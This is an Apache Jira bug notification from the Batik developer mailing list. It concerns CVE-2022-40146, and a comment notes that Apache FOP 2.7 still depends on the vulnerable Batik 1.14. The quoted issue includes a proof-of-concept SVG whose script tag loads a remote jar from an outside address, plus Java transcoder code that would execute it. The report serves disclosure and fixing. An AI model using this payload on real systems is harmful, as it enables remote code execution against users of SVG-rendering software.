[
https://issues.apache.org/jira/browse/BATIK-1335?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17629594#comment-17629594
]
David Campbell commented on BATIK-1335:
---------------------------------------
I understand this is the fix for CVE-2022-40146 - eg
[https://nvd.nist.gov/vuln/detail/CVE-2022-40146]
I also notice that this fix hasn't rolled out in terms of inclusion for example
to a new build of Apache FOP, eg
[https://repo1.maven.org/maven2/org/apache/xmlgraphics/fop-parent/2.7/fop-parent-2.7.pom]
which still references the build prior so could be vulnerable:
<batik.version>{*}1.14{*}</batik.version>
> Jar url should be blocked by DefaultScriptSecurity
> --------------------------------------------------
>
> Key: BATIK-1335
> URL: https://issues.apache.org/jira/browse/BATIK-1335
> Project: Batik
> Issue Type: Bug
> Reporter: Simon Steiner
> Assignee: Simon Steiner
> Priority: Major
> Fix For: 1.15
>
>
> <svg xmlns="http://www.w3.org/2000/svg";
> xmlns:xlink="http://www.w3.org/1999/xlink"; width="450" height="500"
> viewBox="0 0 450 500">
> <script type="application/java-archive"
> xlink:href="jar:http://192.168.1.10/poc.jar!/";></script>
> </svg>
> should be blocked when using:
> JPEGTranscoder t = new JPEGTranscoder();
> t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE);
> t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES,
> "application/java-archive,");
> FileInputStream stream = new FileInputStream("test.svg");
> TranscoderInput input = new TranscoderInput(stream);
> FileOutputStream fos = new FileOutputStream("out.jpg");
> TranscoderOutput output = new TranscoderOutput(fos);
> t.transcode(input, output);
> fos.close();
> CVE-2022-40146
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: batik-dev-unsubscr...@xmlgraphics.apache.org
For additional commands, e-mail: batik-dev-h...@xmlgraphics.apache.org
